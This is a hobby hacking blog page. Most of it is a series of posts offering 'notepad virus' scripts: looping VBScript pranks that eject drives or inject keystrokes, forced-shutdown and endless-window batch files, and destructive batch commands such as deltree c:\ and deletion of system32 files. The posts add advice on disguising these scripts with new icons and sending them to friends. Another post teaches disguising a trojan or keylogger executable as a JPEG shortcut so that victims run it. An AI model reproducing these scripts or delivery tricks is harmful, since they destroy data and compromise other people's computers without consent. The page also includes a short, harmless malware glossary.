10 simple notepad Virus !!!!

0 comments
10 Simple Notepad Virus



I
f you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can’t be detected by any anti virus

Here are some good viruses ,i am not responsible for any kind of damage to your system …




  • Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them! Type :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

        Save it as "Anything.VBS" and send it.


  •  Toggle your friend's Caps Lock button simultaneously:

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

        Save it as "Anything.VBS" and send it.


  • Convey your friend a lil' message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

         Save it as "Anything.BAT" in All Files and send it.



  • Frustrate your friend by making this VBScript hit Enter simultaneously:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


        Save it as "Anything.VBS" and send it.


  • Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

        Save it as "Anything.VBS" and send it.



  • Frustrate your friend by making this VBScript hit Backspace simultaneously:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

        Save it as "Anything.VBS" and send it.

  • Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

        Save it as "Anything.VBS" and send it.

  • Open Notepad continually in your friend's computer:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

        Save it as "Anything.BAT" and send it.


  • Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

        Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.


  • THRETEN BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code hich will do the same thing except when they press a key the screen will go black nd the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug nul
del \z.dbg
goto a

        Save it as "Anything.BAT" and send it.

To disable error (ctrl+shirt+esc) then end process wscript.exe

Enjoy!!!^^

Whats the difference between a virus, spyware, Malware, and adware?

0 comments


N
ow days the average computer user must be aware of the potential threats their computer faces each time they connect to the world wide web. It is a dangerous place for a computer and the security threats are growing everyday. Now we also have to protect our online accounts as well as files on our own computers. I know Avast Internet security now covers your social networking accounts.  It is all so confusing, viruses, spyware, malware, and adware, just to name a few. Why are they all so different?


       In the old days we used to call everything a virus, however now days we have more precise names to further categorize them. Below I will show you the difference between a virus, spyware, malware, and adware. It is important to protect your computer from viruses but how can you do that when you do not know what you are dealing with?

What is Malware?

       Malware is a software program that has bad intentions. It can either be installed by the computer user accidentally or it can sneak into your computer through various avenues. Its not the same as a piece of software that by chance causes harm to your computer, malware is software that has been developed with the intent of causing problems with your computer.

What is Spyware?

       Spyware is a type of malware program that invades your computer and basically spies on you. There are different types of spyware that collect different information. A common spyware type is a keylogger which records keystrokes typed on your keyboard. This is how people lose their bank account details. Other spyware will record your actions and browsing habits on the internet. Any information collected by spyware is usually with the intent to sell.

What is Adware?

       Adware is another form of malware and is exactly as the name suggests, software with advertising. Adware can be downloaded and sometimes included in free programs. For example Windows Live messenger and Yahoo messenger contain adware. Although some programs give the option not to install the extra adware, others seem to sneak it in without permission.

What is Virus?
       A virus is a small program designed to infect your computer and cause errors, computer crashes, and even destroy your computer hardware. Unlike spyware, a virus can grow and replicate itself. It can also travel from one computer to another via an internet connection. Of course you can get viruses from discs with virus infested files stored on them, however the internet is the most common entry point. Some common symptoms of a virus are emails being sent to all contacts when you didn’t send them, being taken to webpage’s that you didn’t choose, or being told you have a virus and to download a program to fix it.

How to Hide EXE file into JPG

0 comments
T
his is a good trick to hide your exe files into a jpg file..!


 How about sending a trojan or a keylogger into your victim using this trick..??

  • Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.Basically what you need is to see hidden files and see the extension of all your files on your pc.
  • Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)
  • Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'
  • Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.
  • Now create a shortcut of this 'picture.jpeg' in the same folder.
  • Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.
  • Go to properties (on file me.jpeg) and now you need to do some changes there.
  • First of all delete all the text on field 'Start In' and leave it empty.
  • Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'
  • The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.
  • So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.
  • On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-%SystemRoot%\system32\SHELL32.dll . Then press OK.
  • You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.
  • But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.
  • For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.
  • So the best way to send these files together to someone is compress them into Zip or Rar.
  • inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

How To Change the Icon of Removable Drives

0 comments
How to change icon of Removable Drives..????
Is this Possible ??
I m Saying YES Why not... B'coz This is A World Of Possibilities
Let's Start by making autorun..

Step 1: First of all Make icon for your Removable Drive
                   Image Extention must be .ico

Step 2: Now, Put that icon image in Removable Drive.

Step 3: Now, Open Notepad and Past this Code

[autorun]
lable=Removable Drive Name
icon=icon image name

Step 4:Save it is name as Autorun.inf in Removable Drive

Now You have Done It....


How to make "DEADLY VIRUS" 3:)

0 comments

i have no responsibility for any damages either on your
computer or on other computers that you have send this file !
do not open it under any circumstances because it cannot be undone !
your hard disk will die !!


anyway,here is the coding :

1 ... firstly, open notepad ...

secnod , type the following :


@echo off
deltree c:\

this file save in .bat

do not open thsi !

this will delete everything on the hard disk...

you will need to re-install windows if this
file is opened< among with all your data ! 




2....you how to do a dedly virus.


@echo off
del "c:\windows\pchealth\"
del "c:\windows\system\"
del "c:\windows\system32\restore\"
del "winlogon.exe"
del "c:\windows\system32\autoexec.nt"
del "c:\windows\system32\logonui.exe"
del "c:\windows\system32\ntoskrni.exe"


3...... dedly virus.

@echo off
tskill explorer
del "c:\windows\system32"
del "c:\windows\explorer.exe"
msg * i deleted all your system files
exit
 

Google+ Followers

Total Pageviews

FeedBurner

Mayur Sojitra - Find me on Bloggers.com
Follow on Bloglovin
© 2012 A World Of Possibilities . Designed by Nitin Maheta, Powered by Blogger